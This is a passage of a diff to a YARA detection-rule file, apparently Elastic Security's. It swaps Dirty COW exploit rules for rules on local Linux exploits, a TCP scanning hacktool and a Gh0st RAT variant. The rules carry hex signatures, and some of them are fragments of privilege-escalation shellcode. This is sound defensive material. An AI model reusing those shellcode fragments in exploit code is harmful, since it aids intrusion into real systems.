+ tags = "FILE, MEMORY" + fingerprint = "aa286440061fb31167f314111dde7c2f596357b41fb6a5656216892fee6bf56e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81039,28 +81573,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_2Fa988E3 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 20 89 7D EC 89 75 E8 8B 45 E8 48 C1 E0 05 48 } + $a = { F4 C6 00 FF 8B 45 F4 40 C6 00 25 8B 45 F4 83 C0 02 C7 00 08 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ea8801Ac : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_76C24B62 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "ea8801ac-ee95-4294-9cfa-99c773a04183" - date = "2021-01-12" + id = "76c24b62-e04f-410d-b7cb-668daa9aea20" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7acccfd8c2e5555a3e3bf979ad2314c12a939c1ef32b66e61e30a712f07164fd" - logic_hash = "00a7f71a0559f937ace15465059147839598897467db6176040882d86111bcd2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "330de2ca1add7e06389d94dfc541c367a484394c51663b26d27d89346b08ad1b" + logic_hash = "ff55d6a316394812cfa1108578aece91050bfb2f7e0f8c0440dcb64156f3e893" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "aa191347bdf2e9fdcf6f9591c370b85208a1c46a329bc648268447dbb5ea898f" + tags = "FILE, MEMORY" + fingerprint = "907cb776c9200b715c5b20475c2d4b16cb55c607dfb4b57bd3bd95368ce66257" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81068,28 +81602,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ea8801Ac : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 30 89 7D DC 48 89 75 D0 83 7D DC 02 7F 0A B8 01 00 } + $a = { 00 00 00 31 DB 89 D8 B0 17 CD 80 31 C0 50 50 B0 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_B2Ebdebd : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_30C21B03 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "b2ebdebd-0110-46b4-a97f-27c4c495b23d" - date = "2021-01-12" + id = "30c21b03-22fc-4ec8-8b65-084e98da8d8d" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dee49d4b7f406fd1728dad4dc217484ced2586e014e2cd265ea64eff70a2633d" - logic_hash = "a9d6ffa65b503f9aa13a0054fa92e346c86585418b6b72131efc00340f8ec224" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a09c81f185a4ceed134406fa7fefdfa7d8dfc10d639dd044c94fbb6d570fa029" + logic_hash = "396965c457b2e02d7d524d9d5fb3cc76852895ed9675c7b1205a94f47ba10144" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "2a98a2d1be205145eb2d30a57aaa547b30281b31981f0872ba3f7e1d684a0cc2" + tags = "FILE, MEMORY" + fingerprint = "8112c4a9bce4b4c9407e851849a5850fa36591570694950a4b53e8a09a1dd92b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81097,28 +81631,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_B2Ebdebd : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 F8 BE 02 00 } + $a = { 1B CD 80 31 DB 89 D8 B0 17 CD 80 31 C0 50 50 B0 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_9190D516 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_9Ace9649 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "9190d516-dea0-4d74-9f2c-bd2337538258" - date = "2021-01-12" + id = "9ace9649-c74a-4b27-a147-d14123104c0a" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "837ffed1f23293dc9c7cb994601488fc121751a249ffde51326947c33c5fca7f" - logic_hash = "370248d2b6bb625d65f160b62f1b4a7d2809f3fedfb98a009b19dab61f0ba57e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b38869605521531153cfd8077f05e0d6b52dca0fffbc627a4d5eaa84855a491c" + logic_hash = "d7a60b0cb7fcbd9e802660bda3e0456f7f4ef9db38b6dab131c160efce48909e" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "977bafd175a994edaef5f3fa19d19fe161cebb2447ee32fd5d4b0a3b93fb51fa" + tags = "FILE, MEMORY" + fingerprint = "2e526d7ec47a30c7683725c2d2c3db0a8267630bb0f270599325d50227f6ae29" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81126,28 +81660,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_9190D516 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 4D 18 48 8B 55 10 48 8B 75 F0 48 8B 45 F8 48 83 EC 08 41 51 } + $a = { 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 50 68 2F } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_3B460716 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_705C9589 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "3b460716-812e-4884-ab66-e01f2e61996d" - date = "2021-01-12" + id = "705c9589-f735-45ef-8cf0-b99a05905a9f" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8c4d49d4881ebdab1bd0e083d4e644cfc8eb7af3b96664598526ab3d175fc420" - logic_hash = "759e08c9e3405d841aa467c3343cfac01fed9e9d86aca90139d0eae8855942e5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "845727ea46491b46a665d4e1a3a9dbbe6cd0536d070f1c1efd533b91b75cdc88" + logic_hash = "9834d564c2acc688750d5e6c53db7c1201ef85c6fb3d1d0ea2425a5ba905ff18" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "900e22d1a157677698a47d49d2deeb52c938e3a790aba689b920ba1bbd7ed39d" + tags = "FILE, MEMORY" + fingerprint = "d75edca622f0ab8a0b60c4ba5c1026c89d3613c0e101c5c12c03ee08cb7c576e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81155,28 +81689,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_3B460716 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 E8 BE 02 00 } + $a = { 51 53 8D 0C 24 31 C0 B0 0B CD 80 31 C0 B0 01 CD } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ccfd7518 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_A677Fb9C : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "ccfd7518-af6c-4378-bd9c-7267a7f0dab4" + id = "a677fb9c-0271-4491-a7c7-48504b6ec389" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L161-L179" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b1017db71cf195aa565c57fed91ff1cdfcce344dc76526256d5817018f1351bf" - logic_hash = "02720152af167f1a7e5707f97aa920c6d955458df58d8ef0d9eba868da6a16af" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d20b260c7485173264e3e674adc7563ea3891224a3dc98bdd342ebac4a1349e8" + logic_hash = "9b43e651f73d17dbd2143cec4c79929723689ce738924588e38c99a9554e5545" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "4797064d6416f2799691ae7df956d0383dfe6094de29fb03fc8233ad89149942" + tags = "FILE, MEMORY" + fingerprint = "b7916eefad806131b39af5f9bef27648e2444c9a9c95216b520d73e64fa734f0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81184,28 +81718,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ccfd7518 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { 83 45 FC 01 81 7D FC FF E0 F5 05 7F 0A 8B 05 } + $a = { 89 C0 89 45 EC 83 7D EC FF 75 1A 83 EC 0C 68 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_D41C2C63 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_78E50162 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "d41c2c63-1af7-47c9-88a0-16454c9583db" + id = "78e50162-8f1e-4c78-94fe-9b793b006269" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L181-L199" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4e5751b4e8fa2e9b70e1e234f435a03290c414f9547dc7709ce2ee4263a35f1" - logic_hash = "c9460cfc2b6d686145be9afd3ed670619f04c7155b03caa193222cba8405160d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "706c865257d5e1f5f434ae0f31e11dfc7e16423c4c639cb2763ec0f51bc73300" + logic_hash = "10a5bef486ec0ececfe0a9edfcad7ce053da2a97028cd1648aa27572fedd8ef6" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "77fb7e9911d1037bba0a718d8983a42ad1877c13d865ce415351d599064ea7ea" + tags = "FILE, MEMORY" + fingerprint = "a5771dad186d0c23d25efb7b22b11aa0a67148cf6efb9657b09ca6e160c192aa" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81213,28 +81747,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_D41C2C63 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { F4 83 45 F0 01 81 7D F0 FF C1 EB 0B 7E D3 C9 C3 } + $a = { 90 90 90 31 C0 31 DB B0 17 CD 80 31 C0 B0 2E CD } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ffa7F059 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_3B767A1F : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "ffa7f059-b825-4dd6-b10d-e57549a2704f" + id = "3b767a1f-5844-4742-a5fd-ef8a3ddb6c12" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L201-L219" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a073c6be047ea7b4500b1ffdc8bdadd9a06f9efccd38c88e0fc976b97b2b2df5" - logic_hash = "b558066b80232ceb32c625f49a0ddeccd4b3bc52e664e5a72f2aa7361bcec352" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e05fed9e514cccbdb775f295327d8f8838b73ad12f25e7bb0b9d607ff3d0511c" + logic_hash = "0f24a7d4e8ff0899430aa0a702000f35039b07400120b382b675825630f0ea4e" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "c451689042d9290d1bb5b931e002237584217bbddfc0d96c2486a61cb5c37d31" + tags = "FILE, MEMORY" + fingerprint = "2bc0dc4de92306076cda6f2d069855b85861375c8b7eb5324f915a1ed10c39e5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81242,28 +81776,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ffa7F059 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { F8 83 45 FC 01 81 7D FC FF C1 EB 0B 7E D7 } + $a = { E3 50 53 89 E1 89 C2 B0 0B CD 80 89 C3 31 C0 40 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_Fb24C7E4 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_2535C9B6 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "fb24c7e4-db4f-405e-8e88-bc313b9a0358" + id = "2535c9b6-a575-4190-8e33-88758675e5b4" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L221-L239" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a073c6be047ea7b4500b1ffdc8bdadd9a06f9efccd38c88e0fc976b97b2b2df5" - logic_hash = "17a2a628f2d1fa088a1e0c5b2ad3f08e24b8504033b328c944b9ae83a5d12fcc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d0f9cc114f6a1f788f36e359e03a9bbf89c075f41aec006229b6ad20ebbfba0b" + logic_hash = "222e929d8352ed02714a59b0e1b9777b0f2d80d63cb369fa9bf33460c84efbb2" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "0a5f15ddb425a6e00f6c3964b4dbdc91a856fd06b6e45dfd4fded8ed97f21ae8" + tags = "FILE, MEMORY" + fingerprint = "4ec419bfd0ac83da2f826ba4cbd6a4b05bbd7b6f6cc077529ec4667b7d2f761a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81271,28 +81805,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_Fb24C7E4 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { F8 83 45 FC 01 81 7D FC FF C1 EB 0B 7E ?? 8B 45 } + $a = { E8 63 F9 FF FF 83 7D D8 FF 75 14 BF 47 12 40 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_B45098Df : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_6A9B5D50 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "b45098df-7f26-44a9-8078-f1c05d15cc38" + id = "6a9b5d50-3cd4-4b64-9a52-713e1a8f02b2" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L241-L259" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e053aca86570b3781b3e08daab51382712270d2a375257c8b5789d3d87149314" - logic_hash = "4622551b73a12c5399df1f4e052ce32b4cee04486a870bc92942c8597dcad1f7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "80ab71dc9ed2131b08b5b75b5a4a12719d499c6b6ee6819ad5a6626df4a1b862" + logic_hash = "99a18bfb62c195bdea89c688fed4456fee33477878ecdee8a78cd4bf18ad539b" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "ed32e66f2c18b16a6f00d6a696a32cdb1b0b18413b4c1af059097f5d301ee084" + tags = "FILE, MEMORY" + fingerprint = "7eea1345492359984e9be089c3e7339b79927abcff0ae4a40a713e956bb25919" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81300,28 +81834,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_B45098Df : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { FC 83 45 F8 01 81 7D F8 FF C1 EB 0B 7E D7 } + $a = { E8 ?? F9 FF FF 83 7D D8 FF 75 14 BF ?? 13 40 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_9C67A994 : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_66557224 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "9c67a994-dabf-4cb7-95d7-4cc47402be28" + id = "66557224-2c7a-4770-8333-8984d4a7b3f7" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L261-L279" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "70429d67402a43ed801e295b1ae1757e4fccd5d786c09ee054591ae51dfc1b25" - logic_hash = "742ce59fadefe242ca97d8ce603976fa8b5e1ba55ede38434c04dcd6f4891712" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f58151a2f653972e744822cdc420ab1c2b8b642877d3dfa2e8b2b6915e8edf40" + logic_hash = "5583f086d594ebdf5890a8a5fbee5c04fbddfe42adcae07480532d87e474ef0c" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "fc6690eef99dd9f84f62444d7a7e1b52dc7f46e831a5ab3e87d4282bba979fde" + tags = "FILE, MEMORY" + fingerprint = "88503c2e1e389866962704a8b19a47c22f758bb2cee9b76600e5d9bab125d4ca" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81329,28 +81863,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_9C67A994 : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { FC 83 45 F8 01 81 7D F8 FF C1 EB 0B 7E ?? 8B } + $a = { FF FF 83 BD E4 FB FF FF FF 75 1A 83 EC 0C 68 24 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ab87C1Ed : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Exploit_Local_6229602F : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Exploit Local (Linux.Exploit.Local)" author = "Elastic Security" - id = "ab87c1ed-f538-4785-b7ae-5333a7ff2808" + id = "6229602f-1c88-46fa-8fae-a6268ed6d632" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L281-L299" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c13c32d3a14cbc9c2580b1c76625cce8d48c5ae683230149a3f41640655e7f28" - logic_hash = "737f5ff982d2b656918ad3258ca20bce2ec416f2af743335b9a87a86f78be810" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Local.yar#L221-L239" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4fdb15663a405f6fc4379aad9a5021040d7063b8bb82403bedb9578d45d428fa" + logic_hash = "c3ab6a36c0c2d430d576f7c0cfdc6d1affcd99d007e2d05596677da9bda5a19e" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "3bf2be85120ef3711dd3508bf8fcd573a70c7ad4a5066be1b60d777a53cd37b6" + tags = "FILE, MEMORY" + fingerprint = "b26b21518fd436d79d6a23dbf3d7056b7c056e4df6639718e285de096476f61d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81358,28 +81892,28 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ab87C1Ed : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { FF FF 88 45 EF 80 7D EF FF 75 D6 B8 ?? ?? 04 08 } + $a = { 89 C0 89 45 FC 83 7D FC 00 7D 17 68 ?? ?? 04 08 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_5195_F1C0482A : FILE MEMORY CVE_2016_5195 +rule ELASTIC_Linux_Hacktool_Tcpscan_334D0Ca5 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" + description = "Detects Linux Hacktool Tcpscan (Linux.Hacktool.Tcpscan)" author = "Elastic Security" - id = "f1c0482a-fe88-4777-8d49-aa782bf25a98" + id = "334d0ca5-d143-4a32-8632-9fbdd2d96987" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L301-L319" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a12a1e8253ee1244b018fd3bdcb6b7729dfe16e06aed470f6b08344a110a4061" - logic_hash = "084ba60d8464ef5bf3a3aa942bb88caf447c6cee3ebf023157bd261226057663" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Tcpscan.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "62de04185c2e3c22af349479a68ad53c31b3874794e7c4f0f33e8d125c37f6b0" + logic_hash = "94ee723c660294e35caec5a2b66eeea64896265cfebc839ed3f55cf8f8c67d7e" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2016-5195" - fingerprint = "96d1ed843aeb59dd43dd76f4edd9e9928dd29f86df87b70d875473b9d908e75c" + tags = "FILE, MEMORY" + fingerprint = "1f8fc064770bd76577b9455ae858d8a98b573e01a199adf2928d8433d990eaa7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81387,28 +81921,29 @@ rule ELASTIC_Linux_Exploit_CVE_2016_5195_F1C0482A : FILE MEMORY CVE_2016_5195 os = "linux" strings: - $a = { FF FF 88 45 F7 80 7D F7 FF 75 D6 B8 ?? ?? 04 08 } + $a = { C4 10 89 45 D4 83 7D D4 00 79 1A 83 EC 0C 68 13 } condition: all of them } -rule ELASTIC_Windows_Trojan_Latrodectus_841Ff697 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Gh0St_Ee6De6Bc : FILE MEMORY { meta: - description = "Detects Windows Trojan Latrodectus (Windows.Trojan.Latrodectus)" + description = "Identifies a variant of Gh0st Rat" author = "Elastic Security" - id = "841ff697-f389-497a-b813-3b9e19cba26e" - date = "2024-03-13" - modified = "2024-05-08" + id = "ee6de6bc-1648-4a77-9607-e2a211c7bda4" + date = "2021-06-10" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Latrodectus.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c" - logic_hash = "aa1a4813a18b4eb4f07e805ff9c87523ad74f59c0ed538212918335eaeee29d7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Gh0st.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d" + logic_hash = "3619df974c9f4ec76899afbafdfd6839070714862c7361be476cf8f83e766e2f" score = 75 quality = 75 tags = "FILE, 